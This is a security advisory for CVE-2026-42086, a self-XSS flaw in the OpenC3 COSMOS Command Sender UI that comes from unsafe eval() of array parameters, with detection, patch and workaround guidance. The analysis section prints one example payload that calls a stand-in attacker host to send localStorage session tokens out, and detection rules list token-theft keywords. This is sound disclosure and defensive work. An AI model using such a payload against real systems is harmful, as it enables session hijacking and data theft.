CVE-2026-42086 Overview
CVE-2026-42086 is a self-Cross-Site Scripting (XSS) vulnerability in OpenC3 COSMOS, an open-source platform for sending commands to and receiving telemetry from embedded systems. The Command Sender UI passes array-like command parameters to JavaScript eval(), allowing attacker-supplied input to execute as code in the victim's browser session. Successful exploitation lets an attacker read or modify data in the authenticated browser context, including session tokens stored in localStorage. The issue affects all versions prior to 7.0.0 and is tracked as [CWE-79]. The maintainers patched the flaw in version 7.0.0.
Critical Impact
An authenticated user tricked into pasting a crafted array parameter into the Command Sender UI executes attacker-controlled JavaScript in their session, exposing session tokens and authenticated COSMOS data.
Affected Products
- OpenC3 COSMOS versions prior to 7.0.0
- OpenC3 COSMOS Command Sender UI component
- Deployments exposing the COSMOS web interface to authenticated operators
Discovery Timeline
- 2026-05-04 - CVE-2026-42086 published to NVD
- 2026-05-04 - Last updated in NVD database
- Patched - Fix released in OpenC3 COSMOS version 7.0.0
Technical Details for CVE-2026-42086
Vulnerability Analysis
The vulnerability exists in the Command Sender UI of OpenC3 COSMOS. When an operator submits a command containing an array-like parameter, the front-end code passes the parameter string to JavaScript's eval() function to convert it into a runtime array. Because eval() executes any valid JavaScript, a crafted parameter such as [1,2];fetch('https://attacker.tld/?t='+localStorage.token) runs as code rather than being parsed as data. The execution occurs inside the authenticated COSMOS origin, granting the attacker access to session storage, DOM contents, and any API the user can reach.
This is classified as self-XSS because the malicious payload must be entered by the victim. Realistic delivery vectors include phishing emails or chat messages instructing operators to paste a value into the parameter field, or social engineering disguised as a legitimate command template. User interaction is required, which is reflected in the moderate scoring.
Root Cause
The root cause is unsafe use of eval() to deserialize user-controlled input. Secure parsers such as JSON.parse() or a dedicated array-literal tokenizer would treat the input strictly as data. The COSMOS team replaced the unsafe parsing path in version 7.0.0.
Attack Vector
The attack requires network access to the COSMOS web interface, valid low-privileged credentials, and user interaction. An attacker convinces an authenticated operator to paste a crafted string into an array parameter field of the Command Sender UI. When the command is submitted, the payload executes in the victim's browser. The attacker can then exfiltrate session tokens, issue commands on behalf of the user, or alter telemetry views.
No verified exploit code is published. See the GitHub Security Advisory for the maintainer's technical description.
Detection Methods for CVE-2026-42086
Indicators of Compromise
- Command Sender submissions where array parameter values contain JavaScript syntax such as fetch(, XMLHttpRequest, document.cookie, or localStorage.
- Outbound browser requests from operator workstations to unfamiliar domains immediately after a COSMOS command submission.
- Unexpected COSMOS API calls originating from a legitimate user session that the operator did not initiate.
Detection Strategies
- Inspect COSMOS application logs for command parameter values containing characters and tokens uncommon in numeric arrays, including (, ;, =, and identifier names.
- Deploy a Content Security Policy (CSP) report endpoint and monitor script-src violations originating from the Command Sender UI.
- Correlate browser proxy logs with COSMOS session activity to flag external HTTP requests triggered during command entry.
Monitoring Recommendations
- Alert on new outbound destinations contacted by browsers with active COSMOS sessions.
- Track command submissions per user and flag parameter payloads exceeding expected length or containing alphabetic characters where numerics are expected.
- Audit localStorage access patterns and authentication token reuse from unexpected IP addresses.
How to Mitigate CVE-2026-42086
Immediate Actions Required
- Upgrade OpenC3 COSMOS to version 7.0.0 or later, which removes the unsafe eval() call.
- Invalidate active operator sessions and rotate any tokens stored in browser localStorage after upgrading.
- Brief operators on the self-XSS pattern and instruct them never to paste parameter values supplied by external parties.
Patch Information
The vulnerability is fixed in OpenC3 COSMOS version 7.0.0. Refer to the GitHub Security Advisory GHSA-ffq5-qpvf-xq7x for upgrade guidance and the patched commit reference.
Workarounds
- Restrict access to the COSMOS web interface to a trusted operator network segment until the upgrade is applied.
- Apply a strict Content Security Policy that disallows unsafe-eval and inline scripts to limit payload execution.
- Require multi-factor authentication for operator accounts to reduce the value of stolen session tokens.
# Upgrade OpenC3 COSMOS containers to the patched release
docker compose pull
OPENC3_TAG=7.0.0 docker compose up -d
# Verify the running version
curl -s http://cosmos.local:2900/openc3-api/version | jq .
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
